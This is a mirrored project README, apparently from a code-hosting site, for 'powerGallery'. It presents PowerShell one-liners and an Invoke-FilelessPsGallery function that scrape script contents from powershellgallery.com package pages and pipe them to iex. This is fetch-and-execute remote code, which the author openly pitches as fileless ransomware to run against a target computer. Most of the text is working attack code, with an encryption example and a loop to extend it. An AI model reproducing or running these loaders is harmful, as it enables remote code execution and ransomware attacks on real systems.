Giter Site home page Giter Site logo

powergallery's Introduction

powerGallery

This one liner will load the neccessary files to encrypt a system straight from the trusted powershellgallery.com website. Used in conjunction with a simple for loop its is now fileless ransomware hosted and executed from your platform

([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex

Next its as simple as running the commands stored in that module agaisnt the system In this instance we can encrypt a string, but why stop there?

$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"

Combining them into a simple one liner. Together with yet another simple functionality the for loop you should be able to see the danger We could run fileless ransomware on a target computer all from a trusted source

([regex]::Matches((irm "https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1"),'(?<=<td class="fileContent .*?">).*?(?=<\/td>)','s').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<[^>]*>'-replace'^\s*',''-replace '[^\x20-\x7E]'|iex;$encryptedMessage = Protect-AESMessage -Message "Sensitive Data" -Password "89c57yj78754cth8"

Get Current Version

# Define the regex pattern to extract content from <h2> within the specified <article> class
$pattern = '<article class="col-sm-12 col-md-8 package-details-main special-margin-left">.*?<h2>(.*?)</h2>'

# Perform the regex match
$match = [regex]::Match($html, $pattern, [System.Text.RegularExpressions.RegexOptions]::Singleline)

# Extract the value
if ($match.Success) {
    $h2Content = $match.Groups[1].Value.Trim()
    # Output the content of the <h2> tag
    $h2Content
} else {
    "No <h2> tag found within the specified <article> class."
}

You can use this function to grab the links of all the .ps1 files in a module from the powershell gallery website

FUNCTION NOT CURRENTLY WORKING, USE THIS SCRIPT INSTEAD OF THE FUNCTION

$module = 'PsAES'
$mod = "https://www.powershellgallery.com/packages/$module"
$content = Invoke-RestMethod -Uri $mod
$regex = '<a\s+[^>]*href="([^"]+\.ps1)"[^>]*>'
$matches = [regex]::Matches($content, $regex)
$baseURL = "https://www.powershellgallery.com"
foreach ($match in $matches) {
$relativeLink = $match.Groups[1].Value
$fullLink = $baseURL + $relativeLink
([regex]::Matches((irm "$fullLink"), '(?<=<td class="fileContent .*?">).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?<!<#)>(?![^#])',''|iex}
function Invoke-FilelessPsGallery {
    param ([string]$module)
    try {

        $mod = "https://www.powershellgallery.com/packages/$module"
        write-host "--> $mod"
        
        $content = Invoke-RestMethod -Uri $mod
        $regex = '<a\s+[^>]*href="([^"]+\.ps1)"[^>]*>'
        $matches = [regex]::Matches($content, $regex)
        $baseURL = "https://www.powershellgallery.com"
        $ps1Links = @()
        foreach ($match in $matches) {
            $relativeLink = $match.Groups[1].Value
            $fullLink = $baseURL + $relativeLink
            $ps1Links += $fullLink
        }
        #return $ps1Links
        foreach ($url in $ps1Links){([regex]::Matches((irm "$url"), '(?<=<td class="fileContent .*?">).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?<!<#)>(?![^#])',''|iex}
    }
    catch {
        Write-Error "An error occurred: $_"
    }
}

Syntax:

$urls = get-Ps1Urls -Url "https://www.powershellgallery.com/packages/PSAES/1.0.0.5"
$urls = @("https://www.powershellgallery.com/packages/PSAES/1.0.0.5/Content/Protect-AESMessage.ps1")

foreach ($url in $urls){([regex]::Matches((irm "$url"), '(?<=<td class="fileContent .*?">).*?(?=<\/td>)', 's').Value|%{[System.Net.WebUtility]::HtmlDecode($_)})-replace'<(?!#)[^>]+>|(?<!<#)>(?![^#])',''|iex}

powergallery's People

Contributors

i-am-jakoby avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.